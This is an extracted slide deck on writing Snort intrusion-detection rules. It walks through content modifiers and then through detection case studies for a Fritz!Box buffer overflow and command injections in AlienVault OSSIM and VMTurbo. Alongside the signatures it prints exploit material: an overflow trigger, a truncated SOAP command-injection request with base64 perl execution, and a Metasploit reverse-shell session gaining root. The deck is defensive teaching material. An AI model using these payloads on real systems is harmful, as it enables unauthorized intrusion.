Click here to load reader

Introduction to Snort Rule Writing

  • View
    957

  • Download
    4

Embed Size (px)

Text of Introduction to Snort Rule Writing

  • Introduction to Snort

    Rule Writing

  • Snort Rule Syntax

    # rule headeralert tcp any any -> 192.168.1.0/24 111 (

    rule action

    protocol

    src address

    src port

    dst address

    dst port

  • Snort Rule Syntax

    # rule option formatalert tcp any any -> 192.168.1.0/24 111 (

    msg:"Rule Message"; \

    rule option

    rule option argument

  • rule option: content

    # content match examplealert tcp any any -> 192.168.1.0/24 111 (

    content:"ABCD"; \# is equivalent to:

    content:"|41 42 43 44|"; \

    The content match finds a static pattern in network data.

  • content modifiers: nocase

    # content match modifiers: nocasealert tcp any any -> 192.168.1.0/24 111 (

    # match "ABCD" or "abcd" etc.content:"ABCD"; nocase;

    nocase makes a content match case insensitive.content matches are case sensitive by default.

  • content modifiers: offset

    # content match modifiers: offsetalert tcp any any -> 192.168.1.0/24 111 (

    # skip 2 bytes before searching for "ABCD"content:"ABCD"; offset:2;

    offset requires the match to occur after the designated offset in network data.

  • content modifiers: depth

    # content match modifiers: depthalert tcp any any -> 192.168.1.0/24 111 (

    # match "ABCD" within the first 4 bytes of the payloadcontent:"ABCD"; depth:4;

    depth restricts how far Snort should search for the specified pattern.

  • content modifiers: distance

    # content match modifiers: distancealert tcp any any -> 192.168.1.0/24 111 (

    # find "DEF" 1 byte after "ABC"content:"ABC"; content:"DEF"; distance:1;

    distance specifies how far into a payload Snort should ignore before starting to search for the specified pattern relative to the end of the previous pattern match.

  • content modifiers: within

    # content match modifiers: withinalert tcp any any -> 192.168.1.0/24 111 (

    # find "EFG" within 10 bytes of "ABC"content:"ABC"; content:"EFG"; within:10;

    within makes sure that at most N bytes are between pattern matches.

  • negated content match

    # negated content matchalert tcp any any -> 192.168.1.0/24 111 (

    # make sure "EFG" is NOT within 10 bytes of "ABC"content:"ABC"; content:!"EFG"; within:10;

    content matches can be negated.

  • content buffers

    # content buffer examplealert tcp any any -> 192.168.1.0/24 111 (

    # match "ABC" within the HTTP URIcontent:"ABC"; http_uri;

    content matches can be restricted to a payload location, such as the HTTP URI.

  • content buffers

    POST /index.php HTTP/1.1Host: example.comContent-Length: 28Content-Type: application/x-www-form-urlencodedCookie: this_is_a_cookie=this_is_its_value

    firstparam=one&secondparam=two

    Buffers: http_method http_uri http_header http_cookiehttp_client_body

  • content modifiers: fast_pattern

    # fast_pattern examplealert tcp any any -> 192.168.1.0/24 111 (

    # set "ABC" as the rule fast_patterncontent:"ABC"; fast_pattern;

    fast_pattern explicitly specifies the content match within a rule to be used with the fast pattern matcher. The fast_pattern serves as the entrance condition for rule evaluation.

  • content modifiers: fast_pattern

    # fast_pattern:only; examplealert tcp any any -> 192.168.1.0/24 111 (

    # set "ABC" as the rule fast_patterncontent:"ABC"; fast_pattern:only;

    fast_pattern:only; selects the content match to be used in the fast pattern matcher for the rule and also specifies that this match will not be evaluated again when the rule enters.

  • rule option: pcre

    # pcre rule option examplealert tcp any any -> 192.168.1.0/24 111 (

    # match the following regexpcre:"/A[BC]D/i"; \

    pcre declares a Perl compatible regular expression for matching on payload data.Flags can be specified after the slash.e.g. /i for case insensitivity.

  • Traffic Triage and Isolation

    Normal Trafficfast_pattern

    content, etc. Vulnerable Application Traffic

    Slow

    Fast

    pcre

    content, etc. Vulnerable Parameter TrafficVulnerability Condition

    Vulnerability Condition

    Traffic VolumeSpeed Traffic Type

  • Detection Strategies

  • Detection Topics

    > Buffer OverflowCommand InjectionDirectory TraversalUse-After-FreeRemote File IncludeBrowser PluginsCross Site Scripting

    Malware Command Traffic

  • Buffer Overflow Overview

    Stack buffer overflow in AVM Fritz!Box daemon

    dsl_control.

    AVM Fritz!Box firmware fails to check the length of user

    supplied data in a 'se' or ScriptExecute command sent in a

    SOAP request to the dsl_control daemon.

  • Buffer Overflow Overview

    dsl_cpi_cli_access.c registers the command 'se' to the DSL_CPE_CLI_ScriptExecute handler function:

    [...]DSL_CPE_CLI_CMD_ADD_COMM (

    "se","ScriptExecute",DSL_CPE_CLI_ScriptExecute,g_sSe);

    [...]

  • Buffer Overflow Overview

    DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute([...]) {[...]DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0};

    if(DSL_CPE_CLI_CheckParamNumber(pCommands,1,DSL_CLI_EQUALS) == DSL_FALSE)

    {return -1;

    }

    DSL_CPE_sscanf(pCommands, "%s", sFileName);

    [...]

  • Buffer Overflow Overview

    The code calls the function DSL_CPE_sscanf in order to

    copy the value of the parameter pCommands to the local

    character array sFileName without restricton or bounds

    checking. The size of the vulnerable stack buffer is 256

    bytes as indicated in dsl_cpi_cli_console.h:

    #define DSL_MAX_COMMAND_LINE_LENGTH 256

    Triggering the vulnerability is then a simple matter of

    sending >256 bytes in the first 'se' parameter.

  • Buffer Overflow Exploit

    se "A"*300

    http://schemas.xmlsoap.org/soap/envelope/

  • Buffer Overflow Detection

    # vulnerable SOAP request# with at least 256 bytes# within #content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; \content:"\s*se\s[^

  • Buffer Overflow Detection

    alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 ( \msg:"SERVER-WEBAPP AVM FritzBox dsl_control stack buffer overflow attempt"; \flow:to_server,established; \content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; \content:"

  • Detection Topics

    > Buffer OverflowCommand InjectionDirectory TraversalUse-After-FreeRemote File IncludeBrowser PluginsCross Site Scripting

    Malware Command Traffic

  • Detection Topics

    Buffer Overflow> Command Injection

    Directory TraversalUse-After-FreeRemote File IncludeBrowser PluginsCross Site Scripting

    Malware Command Traffic

  • Command Injection Overview

    CVE-2014-3805

    Command injection vulnerabilities in AlienVault OSSIM av-

    centerd, which accepts SOAP commands on port 40007.

    SOAP command 'get_log_line' parameter '$number_lines'

    and 'get_license' parameter '$license_type' are used in OS

    commands without sanitization.

  • Command Injection Overview

    /usr/share/alienvault-center/lib/AV/CC/Util.pm

    sub get_log_line() {my ( $function_llamada, $name, $uuid, $admin_ip,

    $hostname, $r_file, $number_lines ) = @_;[...]# $number_lines used in OS command without sanitizationmy $command = "tail -$number_lines $r_file";my @content = `$command`;[...]}

  • Command Injection Overview

    /usr/share/alienvault-center/lib/AV/CC/Util.pm

    sub get_license() {my ( $function_llamada, $name, $uuid, $admin_ip,

    $hostname, $license, $license_type ) = @_;[...]# $license_type used in OS command without sanitizationmy $package = system ("curl --proxy-anyauth -K /etc/curlrc

    http://[...]/avl/$license_type/[...]");}

  • Command Injection Exploit

    POST /av-centerd HTTP/1.1Host: 172.16.8.223:40007User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Content-Length: 765Content-Type: text/xml; charset=utf-8SOAPAction: "AV/CC/Util#get_log_line"

    All[...]&& perl -MMIME::Base64 -e 'system(decode_base64("cGVy[...]

  • Command Injection Exploit

    POST /av-centerd HTTP/1.1Host: 172.16.8.223:40007User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Content-Length: 765Content-Type: text/xml; charset=utf-8SOAPAction: "AV/CC/Util#get_log_line"

    All[...]&& perl -MMIME::Base64 -e 'system(decode_base64("cGVy[...]

  • Command Injection Exploit

    msf exploit(alienvault_centerd_soap_exec) > exploit

    [*] Started reverse handler on 172.16.158.1:4444[*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500

    iduid=0(root) gid=0(root) groups=0(root)

    remember traffic isolation...

  • Command Injection Detection

    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (\msg:"SERVER-WEBAPP AlienVault OSSIM get_log_line command injection attempt"; \flow:to_server,established; \content:"/av-centerd"; nocase; http_uri; \content:"]*?>[^

  • Command Injection Detection

    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (\msg:"SERVER-WEBAPP AlienVault OSSIM get_license command injection attempt"; \flow:to_server,established; \content:"/av-centerd"; nocase; http_uri; \content:"]*?>[^

  • Command Injection Overview

    CVE-2014-5073

    OS command injection vulnerability in VMTurbo

    Operations Manager vmtadmin.cgi parameter 'fileDate'.

    If the 'callType' parameter is set to "DOWN" vmtadmin.cgi

    will pass the value of 'fileDate' to system().

  • Command Injection Overview

    my $actiontype = $query->param("ac